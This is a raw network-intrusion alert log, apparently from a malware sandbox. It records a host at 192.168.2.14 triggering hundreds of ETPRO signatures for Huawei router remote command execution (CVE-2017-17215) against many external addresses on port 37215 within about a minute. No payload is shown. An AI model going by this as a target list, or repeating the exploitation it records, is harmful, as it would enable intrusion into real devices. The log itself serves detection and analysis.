                                            06/14/24-10:43:37.772517TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4437437215192.168.2.14156.87.176.139
                                            06/14/24-10:44:02.367271TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5390237215192.168.2.14156.201.185.113
                                            06/14/24-10:44:10.543899TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5737237215192.168.2.14156.85.114.158
                                            06/14/24-10:44:16.734265TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3393037215192.168.2.1441.161.84.169
                                            06/14/24-10:43:34.660871TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5663437215192.168.2.14156.149.180.35
                                            06/14/24-10:44:00.339346TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5561837215192.168.2.14197.43.156.253
                                            06/14/24-10:44:16.735650TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5544437215192.168.2.14156.198.2.102
                                            06/14/24-10:43:39.789360TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4329637215192.168.2.14156.238.99.22
                                            06/14/24-10:44:10.581790TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5504837215192.168.2.14197.113.68.182
                                            06/14/24-10:44:10.546104TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4413237215192.168.2.14197.221.144.201
                                            06/14/24-10:44:33.135224TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4548037215192.168.2.1441.12.226.94
                                            06/14/24-10:44:08.505106TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5199237215192.168.2.1441.78.62.134
                                            06/14/24-10:43:34.662565TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5615237215192.168.2.1441.137.12.98
                                            06/14/24-10:44:22.878936TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3282637215192.168.2.14156.233.247.191
                                            06/14/24-10:44:12.625336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5992437215192.168.2.1441.63.33.235
                                            06/14/24-10:43:36.702359TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5193637215192.168.2.14197.180.37.137
                                            06/14/24-10:44:18.762942TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4064837215192.168.2.14156.218.58.192
                                            06/14/24-10:43:52.160806TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4436437215192.168.2.14197.197.171.80
                                            06/14/24-10:44:08.519213TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3434437215192.168.2.1441.49.181.194
                                            06/14/24-10:43:39.792192TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4244837215192.168.2.1441.193.247.157
                                            06/14/24-10:44:22.879394TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5519037215192.168.2.14197.212.180.53
                                            06/14/24-10:43:50.115119TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4685837215192.168.2.1441.116.156.13
                                            06/14/24-10:44:14.666134TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3890237215192.168.2.1441.147.242.221
                                            06/14/24-10:43:45.968150TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5435237215192.168.2.14156.229.61.85
                                            06/14/24-10:44:12.642624TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4934637215192.168.2.14197.72.112.17
                                            06/14/24-10:43:41.906000TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3374637215192.168.2.14156.225.180.15
                                            06/14/24-10:43:41.906105TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4615637215192.168.2.14197.86.217.91
                                            06/14/24-10:44:12.640669TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3281437215192.168.2.1441.122.148.20
                                            06/14/24-10:43:37.760119TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5803037215192.168.2.14197.212.199.139
                                            06/14/24-10:43:43.943292TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5731637215192.168.2.14197.237.95.32
                                            06/14/24-10:44:24.947092TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5813637215192.168.2.14197.72.144.29
                                            06/14/24-10:43:48.027979TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5923437215192.168.2.14156.85.28.231
                                            06/14/24-10:43:36.704997TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5840837215192.168.2.14156.244.195.251
                                            06/14/24-10:44:26.977788TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3981837215192.168.2.14156.126.92.79
                                            06/14/24-10:44:12.640527TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6076237215192.168.2.14156.235.120.200
                                            06/14/24-10:44:14.683508TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3590437215192.168.2.1441.159.12.245
                                            06/14/24-10:44:26.998700TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4954637215192.168.2.1441.147.118.37
                                            06/14/24-10:44:29.027932TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5771037215192.168.2.14156.223.137.69
                                            06/14/24-10:44:29.011457TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4974237215192.168.2.1441.218.64.143
                                            06/14/24-10:43:37.760322TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4320637215192.168.2.1441.250.96.192
                                            06/14/24-10:43:36.725440TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4874037215192.168.2.14197.4.143.203
                                            06/14/24-10:43:50.110656TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5593837215192.168.2.14156.80.207.11
                                            06/14/24-10:44:29.024340TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5976837215192.168.2.14197.71.50.253
                                            06/14/24-10:44:24.942817TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5321037215192.168.2.14156.121.115.136
                                            06/14/24-10:44:26.979168TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5074637215192.168.2.14197.27.57.235
                                            06/14/24-10:44:04.411603TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4175837215192.168.2.14197.89.162.195
                                            06/14/24-10:44:14.688082TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4229437215192.168.2.14156.78.211.198
                                            06/14/24-10:43:45.991763TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4650237215192.168.2.14156.153.81.137
                                            06/14/24-10:43:52.159935TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4289437215192.168.2.14156.138.213.21
                                            06/14/24-10:43:34.675323TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3934637215192.168.2.1441.225.163.169
                                            06/14/24-10:43:36.727041TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5675037215192.168.2.14197.36.119.208
                                            06/14/24-10:44:18.775462TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5211837215192.168.2.14197.195.54.196
                                            06/14/24-10:43:39.790579TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5118237215192.168.2.14156.218.56.86
                                            06/14/24-10:43:36.725588TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3851637215192.168.2.1441.129.23.81
                                            06/14/24-10:43:41.912782TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5529237215192.168.2.14197.202.45.30
                                            06/14/24-10:44:22.861061TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4072437215192.168.2.1441.13.214.61
                                            06/14/24-10:44:20.805628TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5655437215192.168.2.1441.191.55.76
                                            06/14/24-10:43:45.989821TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5401637215192.168.2.14197.76.127.23
                                            06/14/24-10:43:50.110890TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5008837215192.168.2.14197.76.60.44
                                            06/14/24-10:44:16.737876TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5369237215192.168.2.1441.167.103.114
                                            06/14/24-10:43:45.965761TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3738037215192.168.2.14156.62.209.100
                                            06/14/24-10:43:52.146726TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6094837215192.168.2.14197.144.202.231
                                            06/14/24-10:43:43.968928TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5248837215192.168.2.14156.187.222.214
                                            06/14/24-10:44:12.641859TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3819837215192.168.2.14197.58.121.180
                                            06/14/24-10:43:52.161634TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3655237215192.168.2.14197.223.161.32
                                            06/14/24-10:43:52.150907TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3616037215192.168.2.1441.148.45.59
                                            06/14/24-10:44:20.804723TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5291437215192.168.2.14156.206.123.134
                                            06/14/24-10:44:31.052881TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3956437215192.168.2.1441.58.99.252
                                            06/14/24-10:43:34.679252TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5847437215192.168.2.14197.79.30.8
                                            06/14/24-10:44:18.779625TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4110037215192.168.2.14197.170.233.201
                                            06/14/24-10:43:56.230485TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5247837215192.168.2.14156.181.104.42
                                            06/14/24-10:43:58.293298TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5533237215192.168.2.1441.145.129.129
                                            06/14/24-10:43:36.723783TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4479037215192.168.2.1441.200.83.167
                                            06/14/24-10:44:29.011823TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5802437215192.168.2.14156.81.164.44
                                            06/14/24-10:44:29.023680TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3683037215192.168.2.14197.23.228.170
                                            06/14/24-10:44:20.828618TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4857037215192.168.2.14197.62.192.159
                                            06/14/24-10:43:52.149844TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3680237215192.168.2.1441.56.77.107
                                            06/14/24-10:43:48.017549TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3777437215192.168.2.14156.102.24.170
                                            06/14/24-10:44:00.342802TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5249237215192.168.2.14197.251.60.209
                                            06/14/24-10:44:04.421149TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4490637215192.168.2.14197.206.132.163
                                            06/14/24-10:43:48.019851TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4447437215192.168.2.14156.170.77.26
                                            06/14/24-10:44:18.763946TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5366237215192.168.2.1441.243.141.246
                                            06/14/24-10:43:54.200852TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3358237215192.168.2.14156.2.242.180
                                            06/14/24-10:43:58.276750TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4660637215192.168.2.1441.157.25.225
                                            06/14/24-10:44:22.879695TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4863837215192.168.2.14156.57.49.151
                                            06/14/24-10:44:29.027708TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3304037215192.168.2.1441.255.165.235
                                            06/14/24-10:43:34.662156TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4975237215192.168.2.14197.165.171.189
                                            06/14/24-10:43:52.143624TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3322837215192.168.2.1441.129.198.146
                                            06/14/24-10:44:00.340900TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5660237215192.168.2.14197.146.69.216
                                            06/14/24-10:43:43.970623TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5723437215192.168.2.14197.165.144.181
                                            06/14/24-10:43:54.202178TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3561037215192.168.2.14156.118.233.145
                                            06/14/24-10:44:12.618427TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3775637215192.168.2.14197.178.91.187
                                            06/14/24-10:43:39.789533TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5786837215192.168.2.14156.189.190.39
                                            06/14/24-10:44:00.324169TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4131237215192.168.2.14156.218.90.26
                                            06/14/24-10:44:02.365186TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5497237215192.168.2.14197.216.104.83
                                            06/14/24-10:44:22.861027TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4882237215192.168.2.14197.19.1.157
                                            06/14/24-10:44:33.133136TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4982637215192.168.2.14156.38.139.140
                                            06/14/24-10:44:31.084609TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3776637215192.168.2.1441.69.33.72
                                            06/14/24-10:44:24.914626TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4288037215192.168.2.1441.1.131.219
                                            06/14/24-10:43:34.679304TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3829037215192.168.2.1441.9.242.9
                                            06/14/24-10:43:50.110612TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5763437215192.168.2.1441.189.233.144
                                            06/14/24-10:43:50.075019TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4080437215192.168.2.14197.78.168.38
                                            06/14/24-10:44:04.423436TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3414037215192.168.2.14197.223.227.82
                                            06/14/24-10:44:02.367761TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3799637215192.168.2.1441.247.142.178
                                            06/14/24-10:44:00.343749TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5915437215192.168.2.14156.138.190.104
                                            06/14/24-10:43:54.200786TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4786037215192.168.2.14197.58.84.18
                                            06/14/24-10:44:16.717658TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3714237215192.168.2.14197.208.10.62
                                            06/14/24-10:43:36.724756TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4643437215192.168.2.1441.105.239.212
                                            06/14/24-10:43:34.662916TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5697037215192.168.2.14156.17.229.84
                                            06/14/24-10:44:12.641910TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3960837215192.168.2.1441.192.173.127
                                            06/14/24-10:44:14.669991TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3446037215192.168.2.14156.132.145.74
                                            06/14/24-10:44:29.011899TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4598237215192.168.2.1441.76.113.195
                                            06/14/24-10:43:58.275279TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4547437215192.168.2.14197.252.83.8
                                            06/14/24-10:44:06.453508TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4391037215192.168.2.14197.71.179.53
                                            06/14/24-10:44:10.568859TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3729037215192.168.2.14197.47.138.73
                                            06/14/24-10:44:33.132781TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5164037215192.168.2.1441.152.67.145
                                            06/14/24-10:43:48.030486TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4692037215192.168.2.1441.231.9.121
                                            06/14/24-10:43:56.226096TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4111837215192.168.2.14197.187.74.179
                                            06/14/24-10:44:29.011091TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5940237215192.168.2.14197.250.78.191
                                            06/14/24-10:43:48.027816TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5917837215192.168.2.14197.122.38.62
                                            06/14/24-10:43:48.016877TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4518237215192.168.2.1441.218.228.87
                                            06/14/24-10:44:02.381445TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4457437215192.168.2.1441.214.61.98
                                            06/14/24-10:44:00.340000TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4550837215192.168.2.14197.96.122.184
                                            06/14/24-10:44:29.011582TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5625637215192.168.2.14156.177.38.118
                                            06/14/24-10:44:18.776310TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3520037215192.168.2.1441.45.7.207
                                            06/14/24-10:43:37.762071TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3564437215192.168.2.1441.163.194.111
                                            06/14/24-10:43:52.159983TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5952437215192.168.2.1441.185.90.54
                                            06/14/24-10:44:29.025611TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3414637215192.168.2.14156.232.128.0
                                            06/14/24-10:43:41.849511TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5354237215192.168.2.14197.36.39.45
                                            06/14/24-10:44:08.501389TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5471637215192.168.2.14197.76.14.225
                                            06/14/24-10:44:33.133801TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5138437215192.168.2.1441.232.254.48
                                            06/14/24-10:44:14.668528TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3765037215192.168.2.1441.127.197.120
                                            06/14/24-10:43:50.111593TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5483037215192.168.2.14197.125.140.178
                                            06/14/24-10:44:31.052532TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3333437215192.168.2.14197.65.196.81
                                            06/14/24-10:44:04.422278TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5597637215192.168.2.14156.121.127.129
                                            06/14/24-10:43:58.277267TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3590037215192.168.2.14197.151.0.52
                                            06/14/24-10:44:00.323070TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3966237215192.168.2.14197.135.191.252
                                            06/14/24-10:44:29.013765TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5792437215192.168.2.14156.171.223.105
                                            06/14/24-10:43:50.073997TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5775037215192.168.2.14197.225.212.58
                                            06/14/24-10:44:12.615916TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6087237215192.168.2.14197.118.122.74
                                            06/14/24-10:44:12.614393TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4317837215192.168.2.1441.214.203.32
                                            06/14/24-10:44:06.453619TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5051237215192.168.2.1441.228.212.156
                                            06/14/24-10:44:10.563718TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5237237215192.168.2.14197.236.37.36
                                            06/14/24-10:44:24.934539TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5477237215192.168.2.1441.209.8.162
                                            06/14/24-10:44:33.135133TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4469637215192.168.2.14197.50.66.247
                                            06/14/24-10:43:34.679194TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4373037215192.168.2.1441.92.62.246
                                            06/14/24-10:43:39.808400TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5486637215192.168.2.1441.158.16.212
                                            06/14/24-10:43:36.727217TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4378837215192.168.2.14197.166.206.193
                                            06/14/24-10:44:14.683332TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4167237215192.168.2.14156.74.201.249
                                            06/14/24-10:43:34.677744TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5466437215192.168.2.1441.10.51.214
                                            06/14/24-10:44:00.323919TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5150237215192.168.2.14156.171.180.86
                                            06/14/24-10:44:12.625305TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4839437215192.168.2.14197.199.161.145
                                            06/14/24-10:44:06.471439TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3660237215192.168.2.14156.159.229.193
                                            06/14/24-10:44:18.765649TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4545637215192.168.2.1441.244.19.214
                                            06/14/24-10:43:58.291253TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5630437215192.168.2.1441.214.214.124
                                            06/14/24-10:44:33.148399TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5635237215192.168.2.1441.83.161.39
                                            06/14/24-10:43:52.165088TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5400437215192.168.2.1441.57.102.240
                                            06/14/24-10:44:29.010485TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3668637215192.168.2.14197.186.252.67
                                            06/14/24-10:43:48.019359TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3506837215192.168.2.1441.224.156.97
                                            06/14/24-10:44:29.024869TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4284437215192.168.2.1441.224.249.39
                                            06/14/24-10:44:10.545113TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4905837215192.168.2.1441.115.28.210
                                            06/14/24-10:44:35.182194TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4388437215192.168.2.1441.126.44.150
                                            06/14/24-10:43:52.146557TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5082637215192.168.2.1441.223.184.157
                                            06/14/24-10:44:31.056659TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3735637215192.168.2.1441.215.220.244
                                            06/14/24-10:44:31.051871TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5597837215192.168.2.14156.233.18.214
                                            06/14/24-10:43:37.763074TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5206437215192.168.2.14156.24.199.229
                                            06/14/24-10:44:14.669352TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5639837215192.168.2.14197.165.51.86
                                            06/14/24-10:43:45.989461TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3592437215192.168.2.14197.94.23.83
                                            06/14/24-10:43:41.902023TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5382637215192.168.2.1441.88.56.234
                                            06/14/24-10:44:26.977925TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3806837215192.168.2.1441.67.32.211
                                            06/14/24-10:44:31.054037TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4684637215192.168.2.14156.248.148.15
                                            06/14/24-10:43:37.761323TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4041437215192.168.2.14156.152.22.243
                                            06/14/24-10:44:02.366806TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5744837215192.168.2.14197.95.58.58
                                            06/14/24-10:44:16.737633TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3741237215192.168.2.14197.122.152.27
                                            06/14/24-10:44:22.858038TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5997637215192.168.2.14197.134.110.69
                                            06/14/24-10:44:02.367456TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4442637215192.168.2.14197.20.9.137
                                            06/14/24-10:44:08.519183TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5943237215192.168.2.1441.170.246.219
                                            06/14/24-10:44:14.685022TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4594437215192.168.2.1441.20.201.127
                                            06/14/24-10:43:34.675375TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5503237215192.168.2.14197.95.168.17
                                            06/14/24-10:44:26.977279TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4054037215192.168.2.1441.39.163.121
                                            06/14/24-10:44:06.472285TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6004837215192.168.2.1441.76.200.239
                                            06/14/24-10:43:52.161605TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6089237215192.168.2.14197.52.238.225
                                            06/14/24-10:44:18.763491TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6027637215192.168.2.1441.13.65.252
                                            06/14/24-10:44:00.322246TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3768437215192.168.2.14197.6.113.110
                                            06/14/24-10:44:18.776365TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4931237215192.168.2.14197.117.210.103
                                            06/14/24-10:44:18.778073TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3475037215192.168.2.14156.42.151.174
                                            06/14/24-10:43:56.225967TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4510837215192.168.2.14156.195.103.24
                                            06/14/24-10:44:22.861768TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4292637215192.168.2.14156.187.28.148
